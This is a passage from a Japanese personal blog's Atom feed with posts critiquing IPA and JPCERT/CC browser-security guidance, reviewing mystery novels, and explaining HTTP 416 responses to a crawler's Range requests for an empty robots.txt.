href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a></span></p></div></div></content></entry><entry><title>2008年10大脅威</title><link href="http://bakera.jp/ebi/topic/3558" /><id>tag:bakera.jp,2008:/ebi/topic/3558</id><updated>2009-06-01T17:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/3/24">2009年3月24日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3558">2008年10大脅威</a></h2><p class="subinfo"><span class="updated">更新: 2009年6月1日17時0分頃</span></p><p>「<a href="http://www.ipa.go.jp/security/vuln/10threats2009.html">「10大脅威 攻撃手法の『多様化』が進む」を公開</a> <em class="domain-info">(www.ipa.go.jp)</em>」ということで公開されたようです。みなさんおつかれさまでした。</p><p class="note">※26ページ辺りに名前出させていただいております。</p><p>ちなみに今年からちょっとフォーマットが変わっていて、「組織への脅威」「利用者への脅威」「システム管理者・開発者への脅威」が別々に掲載されるようになりました。</p><p>情報セキュリティ白書2009自体はもう少し先になるようです。</p><p class="note">※2009-06-01追記: 出ました……<a href="../topic/3615">情報セキュリティ白書2009</a>。</p><ul class="comment-link"><li><a href="../topic/3558/comment">「2008年10大脅威」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a></span></p></div></div></content></entry><entry><title>スクリプト無効は万人にオススメできるのか</title><link href="http://bakera.jp/ebi/topic/3614" /><id>tag:bakera.jp,2008:/ebi/topic/3614</id><updated>2009-06-01T12:07:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/5/31">2009年5月31日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/3614">スクリプト無効は万人にオススメできるのか</a></h2><p class="subinfo"><span class="updated">更新: 2009年6月1日12時7分頃</span></p><p><a href="http://takagi-hiromitsu.jp/diary/20090531.html#p01">「NoScript」をやめて「RequestPolicy」にした</a> <em class="domain-info">(takagi-hiromitsu.jp)</em>。見出しはFirefox拡張機能の話に見えますが、話の内容としては「スクリプト無効は万人にオススメできるのか?」という話ですね。</p><div class="quote-and-cite"><blockquote><p>ある脆弱性が発見されてパッチがまだ出ていないときに、回避策としてJavaScriptのオフが紹介されることがよくあるが、それはその脆弱性についての回避策（の一つ）であって解決策ではない。そこを混同させて語るのはやめてもらいたい。</p></blockquote></div><p>確かによくありますね。IPAの「<a href="http://www.ipa.go.jp/security/personal/base/internet/point1.html">ブラウザ（Internet Explorer等）のセキュリティ設定をする</a> <em class="domain-info">(www.ipa.go.jp)</em>」も無効にする方法を説明していますし、<a href="../topic/3357">ITProのセキュリティ検定</a>も「スクリプト無効で攻撃が防げる」などと言っていました。</p><p>しかし実際のところ、スクリプト無効でのブラウザの運用は大変です。スクリプト無効で残念なことになるサイトは多く、そういうサイトでどうしたら良いのか、きちんと分かっていなければ困るはずです。</p><p>もっとも、スクリプト必須のサイトでは、スクリプトを有効にするための設定方法を説明してくれていることが多いでしょう。ですから、サイトの説明に従えば問題ない……と言いたいところですが、その説明に問題があることも多いので困ります。うっかり説明に従うと、インターネットゾーンで「スクリプトによる貼り付け処理」なんかを有効にさせられて、初期状態よりセキュリティが弱くなってしまうことになりかねません。</p><p>分かっている人が自分の意思でスクリプトを無効にする分には問題ないと思いますが、誰にでもオススメできるものではないと思うのですよね。</p><p class="note">※ちなみに、かく言う私は普段スクリプトもActiveXも無効にしていて、<a href="../topic/3321">真っ白だと文句を言う係</a>です。会社に一人はこういう人がいた方が良いと思うので。</p><ul class="comment-link"><li><a href="../topic/3614/comment">「スクリプト無効は万人にオススメできるのか」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Web">Web</a> / <a href="../genre/UA">UA</a></span></p></div></div></content></entry><entry><title>安全なWebブラウザの使い方</title><link href="http://bakera.jp/ebi/topic/3353" /><id>tag:bakera.jp,2008:/ebi/topic/3353</id><updated>2009-05-31T23:55:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/4">2008年11月4日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3353">安全なWebブラウザの使い方</a></h2><p class="subinfo"><span class="updated">更新: 2009年5月31日23時55分頃</span></p><p>「<a href="http://internet.watch.impress.co.jp/cda/news/2008/11/04/21405.html">JPCERT/CC、技術メモ「安全なWebブラウザの使い方」を公開</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>」。<a href="http://www.jpcert.or.jp/ed/">JPCERT/CC 技術メモ</a> <em class="domain-info">(www.jpcert.or.jp)</em>でPDFがダウンロードできます。</p><p>これはすばらしい良書ですね。なぜなら、「Netscapeを使うな」という主旨のことが書いてあるからです。名指しでないのが残念ですが。:-)</p><p>それはそれとして、すこし気になった点をいくつかメモしておきます。</p><p>8ページ目。</p><div class="quote-and-cite"><blockquote><p>SSL 2.0 には実装上の脆弱性があります。SSL 2.0 のみでしか利用できない Web ページはほとんど存在せず、またサポートしている暗号のアルゴリズムも古いため、ブラウザの設定で無効化して使わないようにすべきです。</p></blockquote></div><p>実装上の脆弱性なら、脆弱でないように実装すれば良いだけのように思えますが……。</p><p>実際には、これは仕様上の制限だと思うのですが、どうなのでしょうか。中間者が暗号強度をダウングレードする攻撃が有名ですが、SSL2.0の仕様にしたがって実装する限り、これを避けることはできないのではないかと思いますが……。</p><p class="note">※参考: <a href="http://www.oiwa.jp/~yutaka/tdiary/20050910.html#p01">SSL 2.0 と輸出強度暗号</a> <em class="domain-info">(www.oiwa.jp)</em></p><p>それから9ページ。</p><div class="quote-and-cite"><blockquote><p>この章では、前章で述べた注意事項に対応する、個々の Web ブラウザでの具体的な設定方法を、主なWebブラウザについて説明していきます。</p></blockquote></div><p>と言いながら、</p><div class="quote-and-cite"><blockquote><p>[ツール]→[インターネットオプション]→[セキュリティ]→[Web コンテンツのゾーン*を選択してセキュリティのレベルを設定する] →[インターネット] / [イントラネット]/ [信頼済みサイト]/ [制限付きサイト]を選択 →[既定のレベル]を選択する、もしくは[レベルのカスタマイズ]で各種スクリプトごとにゾーンごとの信頼度に応じて有効/無効/確認を求める等を選択する →場合によって[信頼済みサイト]/ [制限サイト]のそれぞれのゾーンごとに、Web サイトの信頼度に応じて、URLを[追加]/[削除]する</p></blockquote></div><p>「場合によって」「信頼度に応じて」って……どのあたりが具体的なのでしょうか。どのゾーンにどのセキュリティレベルを適用すれば良いのか、具体的にわからないと設定できないと思います。</p><p>また、デフォルトでスクリプト無効にしましょう、という旨のことは書かれているのですが、有効にしたいときにどういう運用をすれば良いのか分かりません。信頼済みサイトゾーンを利用する想定なのであれば、信頼済みサイトゾーンのセキュリティレベルを「低」のままにしないように注意する必要があるでしょう。</p><p class="note">※この作者はIEを使っていないのかもしれないなぁと思ったり。Firefoxの設定はけっこう充実しています。</p><p class="note">※2009-05-31追記: スクリプトを無効にして運用するのは大変なので、普通の人にはあまりオススメしたくないですね。「<a href="../topic/3614">スクリプト無効は万人にオススメできるのか</a>」参照。</p><p>22ページ。</p><div class="quote-and-cite"><blockquote><p>不特定多数によって書き込みが行われる掲示板・ブログ等の Web サイトでは、極力リンクをクリックしない方がよいでしょう。どうしてもリンク先にアクセスしたい場合は、リンクをクリックする前に、カーソルをリンクの上に移動し、ステータスバーなどでアクセスしようとしている URL を確認し、信頼できるドメインかどうかを十分に吟味した上でクリックして下さい。</p><p class="snip"><em>(～中略～)</em></p><p>表示と参照先URLが異なる、単純な HTML 上の表示の偽装への対策は、上記②の対策で紹介したステータスバーなどによる確認が良いでしょう。しかし、一部 Web サイトでは JavaScript 等によってステータスバーに表示される URL を置き換えている場合があります。これを防ぐにはスクリプトの実行を一旦制限した上で URL を確認する必要があります。</p></blockquote></div><p>そこで攻撃者はリダイレクタを悪用するわけですね。:-)</p><p>アクセス前にリンク先のURLを確認する、という手法には限界がありますし、これを素直に実践すると、リンクをクリックするたびに「スクリプト無効にする→URLを確認する→クリック」としなければならないのですが、それは現実的なのでしょうか。「悪意あるサイトにアクセスしないように気をつける」というより、「既に悪意あるサイトにアクセスしているかもしれないという前提で行動する」という方が良いようにも思いますが。</p><p>これに関連して、24ページ。</p><div class="quote-and-cite"><blockquote><p>HTTPS による暗号化通信が行われている Web ページでは、SSL サーバ証明書に問題がないことを確認することが重要です。Web ブラウザは証明書の検証を自動で行い、失敗した場合には警告を表示します。警告が表示された場合には、速やかにそのWeb ページの閲覧を中止してください</p></blockquote></div><p>これはまあ良いのですが、そもそもHTTPSによる暗号化通信が行われていないサイトに入力フォームがあった場合にはどうしたら良いのでしょうか。HTTPSのときだけ気をつけて、HTTPSでないページでパスワードや個人情報を入力してしまったら意味がないような気がしますが、それはどこにも書かれていないのですよね。</p><p class="note">※まあ、事情があって書けなかったのかもしれませんが。:-)</p><ul class="comment-link"><li><a href="../topic/3353/comment">「安全なWebブラウザの使い方」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Web">Web</a> / <a href="../genre/Internet%20Explorer">Internet Explorer</a> / <a href="../genre/Firefox">Firefox</a> / <a href="../genre/JPCERT%EF%BC%8FCC">JPCERT/CC</a></span></p></div></div></content></entry><entry><title>配達あかずきん</title><link href="http://bakera.jp/ebi/topic/3610" /><id>tag:bakera.jp,2008:/ebi/topic/3610</id><updated>2009-05-27T00:25:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/5/26">2009年5月26日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3610">配達あかずきん</a></h2><p class="subinfo"><span class="updated">更新: 2009年5月27日0時25分頃</span></p><p>読み終わったのでメモ。</p><ul><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4488487017&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">配達あかずきん - 成風堂書店事件メモ</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4488487017" alt="" width="1" height="1" /></span></li></ul><p>書店ミステリ? 読者の知らない情報がないと結論を導き出せないパターンが多く、推理ものとしてはややアンフェアな感じもありますが、面白いからいいかなと。実在する本の話がたくさん出てくるのも良いですね。以下、一口メモ。</p><div class="section"><h3 id="section19">パンダは囁く</h3><p>謎の暗号。いやー、これは何のことかすぐに分かりますよね? 何故分からないのかと、やきもきしてしまったり。しかし、意味が分かってもそれだけでは解読できないのであった……。</p><p>以下、ネタバレ気味ですが出てきた本をメモしておきます。</p><ul><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4041433010&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">あゝ野麦峠</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4041433010" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4087485463&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">上杉鷹山</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4087485463" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/409386117X&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">いま、会いにゆきます</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=409386117X" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4167733013&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">葉桜の季節に君を想うということ</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4167733013" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4101304718&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">電車男</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4101304718" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4004306655&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">熊野古道</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4004306655" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/410132722X&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">透明な檻</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=410132722X" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4101394113&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ダレカガナカニイル…</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4101394113" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4101386129&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">殺人鬼</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4101386129" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4101134200&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ひとごろし</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4101134200" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4101117241&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">脱出</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4101117241" alt="" width="1" height="1" /></span></li></ul></div><div class="section"><h3 id="section20">標野にて 君が袖振る</h3><p>これも、意味は分かるけれど情報不足で結論にたどり着けないタイプの話。最後の展開はちょっとびっくり。</p></div><div class="section"><h3 id="section21">配達あかずきん</h3><p>表題作。これは面白い話ですが、やや腑に落ちない点も。まず、被害者の行動。人に見られたくない写真なのでしょうに、騒いだら見せざるを得なくなる……というか実際見せていると思うのですが、普通なら平気で見せられる写真ではないように思うわけでして、この辺りの心理がよく分かりません。あと、犯人の行動。べつに人を殺すほどの事じゃないですよね。</p><p>とはいえ、話としてはいちばん面白く、楽しめました。</p></div><div class="section"><h3 id="section22">六冊目のメッセージ</h3><p>出てきた本。</p><ul><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4093873631&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211"><ruby><rb>宙</rb><rp>(</rp><rt>そら</rt><rp>)</rp></ruby>の旅</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4093873631" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4062663570&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">散策 ひと里の花</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4062663570" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/487197491X&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ダヤンのスケッチ教室</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=487197491X" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/404853405X&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">民子</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=404853405X" alt="" width="1" height="1" /></span></li><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4150103453&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">夏への扉</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4150103453" alt="" width="1" height="1" /></span></li></ul><p>……全敗ですよ。orz</p></div><div class="section"><h3 id="section23">ディスプレイ・リプレイ</h3><p>「トロピカル」は架空のコミックでしょうが「ワンピース」がモデル? これも微妙に動機が理解しがたい話。ふつうに言えばいいのに。</p></div><p class="note">※このすぐ下にいっぱい画像が出そうな予感。:-)</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3610/comment">「配達あかずきん」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%9C%AC">本</a> / <a href="../genre/%E8%B2%B7%E3%81%84%E7%89%A9">買い物</a></span></p></div></div></content></entry><entry><title>ひとがた流し</title><link href="http://bakera.jp/ebi/topic/3606" /><id>tag:bakera.jp,2008:/ebi/topic/3606</id><updated>2009-05-22T14:10:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/5/21">2009年5月21日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/3606">ひとがた流し</a></h2><p class="subinfo"><span class="updated">更新: 2009年5月22日14時10分頃</span></p><p>読み終わったのでメモ。</p><ul><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4101373310&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ひとがた流し</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4101373310" alt="" width="1" height="1" /></span></li></ul><p>強いなぁ、と思いました。頼ることができる友人、家族あるいは親がいるというだけでも奇跡のような幸福だと思いますが、その人たちがみんなそれぞれ強くて、輝いている感じ。</p><p>あと、章をまたがるときの人から人にバトンタッチされて行く感じが良いですね。</p><p>名作だと思いますがミステリではないので、ミステリを期待して買った人は残念な思いをするかも知れません。</p><p class="note">※それにしても、「<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4101373272&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">月の砂漠をさばさばと</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4101373272" alt="" width="1" height="1" /></span>」の親子だったとは。最初全く気がつきませんでした。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3606/comment">「ひとがた流し」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%9C%AC">本</a> / <a href="../genre/%E8%B2%B7%E3%81%84%E7%89%A9">買い物</a> / <a href="../genre/%E5%8C%97%E6%9D%91%E8%96%AB">北村薫</a></span></p></div></div></content></entry><entry><title>とりまとめてください</title><link href="http://bakera.jp/ebi/topic/660" /><id>tag:bakera.jp,2008:/ebi/topic/660</id><updated>2009-05-15T19:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/6/24">2003年6月24日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/660">とりまとめてください</a></h2><p class="subinfo"><span class="updated">更新: 2009年5月15日19時0分頃</span></p><p>こんなログが。</p><div class="sample"><p>2003-06-24 05:51:47 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:51:47 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:51:47 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:51:47 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:51:47 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:51:47 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:56:52 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:56:52 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:56:52 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -<br />2003-06-24 05:56:52 218.44.76.90 - 211.16.234.154 80 GET /robots.txt - 416 Hatena+Antenna/0.4+(http://a.hatena.ne.jp/help#robot) -</p></div><p>取りに来るのは良いのですが、同じリソースを何度もゼロ間隔でというのはちょっと。たぶん<dfn class="glossary"><a href="../../glossary/%E3%82%A2%E3%83%B3%E3%83%86%E3%83%8A">アンテナ</a></dfn>に登録しているユーザの数だけリクエストしているのだろうと思いますが、一回にまとまらないのかしら。</p><p>応答のステータスが全部 <dfn class="glossary">416</dfn> になっていますが、これはサイズ 0 のリソースに Range つきリクエストをしているためです。サイズ 0 でも 0バイト目から取得すれば <dfn class="glossary"><a href="../../glossary/200">200</a></dfn> なり <dfn class="glossary"><a href="../../glossary/204">204</a></dfn> なり <dfn class="glossary">206</dfn> なりになるのでは、などと思うかもしれませんが、実は Range の範囲は 1バイト目からのオフセットなのです。たとえば、次のようなフィールドを含む GET リクエストを送ったとします。</p><div class="sample"><p>Range: bytes=0-0</p></div><p>範囲が 0～0 なので空文字列が得られる……なんてことにはならなくて、これは最初の一文字を得る結果になります。</p><p class="note">※206 応答ができるサーバならば、ですが。Range 指定があっても 200 で応答して内容全部を送ってくるサーバもあり得ます。</p><p>そんなわけで、もともとのサイズが 0 であれば Range つきリクエストは必ず 416 になってしまいます。これは IIS だけでなく、Apache でもやはりそうなります。仕様的にも正しいのですが、サイズ 0 だったら <dfn class="glossary"><a href="../../glossary/204">204</a></dfn> で応答してくれたほうが嬉しいような気もしますね……。</p><p class="note">※2009-05-15追記: 現在ではrobots.txtへのリクエストには204(No Content)で応答するようにしています。</p><ul class="comment-link"><li><a href="../topic/660/comment">「とりまとめてください」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B5%E3%83%BC%E3%83%90">サーバ</a> / <a href="../genre/UA">UA</a> / <a href="../genre/HTTP">HTTP</a></span></p></div></div></content></entry><entry><title>416 Requested Range Not Satisfiable</title><link href="http://bakera.jp/ebi/topic/495" /><id>tag:bakera.jp,2008:/ebi/topic/495</id><updated>2009-05-15T19:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/4/7">2003年4月7日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/495">416 Requested Range Not Satisfiable</a></h2><p class="subinfo"><span class="updated">更新: 2009年5月15日19時0分頃</span></p><p>HTTP のステータスコード 416 は "Requested Range Not Satisfiable" です。名前の通り、Range つきのリクエストに対して指定された Range が存在しない時に発生するのですが、そもそも Range つきのリクエスト自体が<ruby><rb>希</rb><rp>(</rp><rt>まれ</rt><rp>)</rp></ruby>で、今までに現物を見たことがありませんでした。</p><p>が、今日、Hatena Antenna/0.4 というエージェントが 416 を喰らっているのを発見。 /robots.txt を GET しようとして 416 になっていますが、何を隠そう /robots.txt は空のファイルで、Content-Length が 0 ですから Range つきリクエストなんて失敗するに決まっています。416 になっていること自体は不思議でも何でもありませんが、むしろどうして /robots.txt に Range つきのリクエストをしているのかが気になります。</p><p>なんでだなんでだろー。</p><p class="note">※というか、空なら 200 OK じゃなくて 204 No Content で応答した方が良いという話なのかも……。</p><p class="note">※2009-05-15追記: 続きあります。「<a href="../topic/508">416対策</a>」。</p><ul class="comment-link"><li><a href="../topic/495/comment">「416 Requested Range Not Satisfiable」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E5%87%BA%E6%9D%A5%E4%BA%8B">出来事</a> / <a href="../genre/%E3%83%A1%E3%83%A2">メモ</a> / <a href="../genre/HTTP">HTTP</a> / <a href="../genre/UA">UA</a> / <a href="../genre/httpd">httpd</a> / <a href="../genre/IIS">IIS</a> / <a href="../genre/%E3%82%B5%E3%83%BC%E3%83%90">サーバ</a> / <a href="../genre/altba.com">altba.com</a></span></p></div></div></content></entry><entry><title>416対策</title><link href="http://bakera.jp/ebi/topic/508" /><id>tag:bakera.jp,2008:/ebi/topic/508</id><updated>2009-05-15T19:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/4/14">2003年4月14日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/508">416対策</a></h2><p class="subinfo"><span class="updated">更新: 2009年5月15日19時0分頃</span></p><p>「<a href="../topic/495">416 Requested Range Not Satisfiable</a>」で書きましたが、Hatena Antenna は相変わらず 416 を喰らい続けている模様。実害はないのですが、ログに残るのが鬱陶しいったらありゃしません。robots.txt は読んでいるのでしょうから、ためしに /robots.txt に</p><div class="sample"><p>User-agent: Hatena Antenna<br />Disallow: /bakera/robots.txt<br />Disallow: /bakera/hatomaru.aspx/robots.txt<br />Disallow: /bakera/hatomaru.aspx/ebi/robots.txt</p></div><p>こう書いてみました。なんかものすごく本末転倒な気がしますが、効果あるのでしょうか。</p><p class="note">※たぶん効果ないと思いますが、まあものは試しということで。</p><p class="note">※2009-05-15追記: 続きあります。「<a href="../topic/660">とりまとめてください</a>」。</p><ul class="comment-link"><li><a href="../topic/508/comment">「416対策」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E5%87%BA%E6%9D%A5%E4%BA%8B">出来事</a> / <a href="../genre/UA">UA</a> / <a href="../genre/%E3%82%B5%E3%83%BC%E3%83%90">サーバ</a> / <a href="../genre/altba.com">altba.com</a></span></p></div></div></content></entry><entry><title>扉は閉ざされたまま</title><link href="http://bakera.jp/ebi/topic/3562" /><id>tag:bakera.jp,2008:/ebi/topic/3562</id><updated>2009-04-02T00:30:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/3/31">2009年3月31日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3562">扉は閉ざされたまま</a></h2><p class="subinfo"><span class="updated">更新: 2009年4月2日0時30分頃</span></p><p>読み終わったので。</p><ul><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4396334060&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">扉は閉ざされたまま</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4396334060" alt="" width="1" height="1" 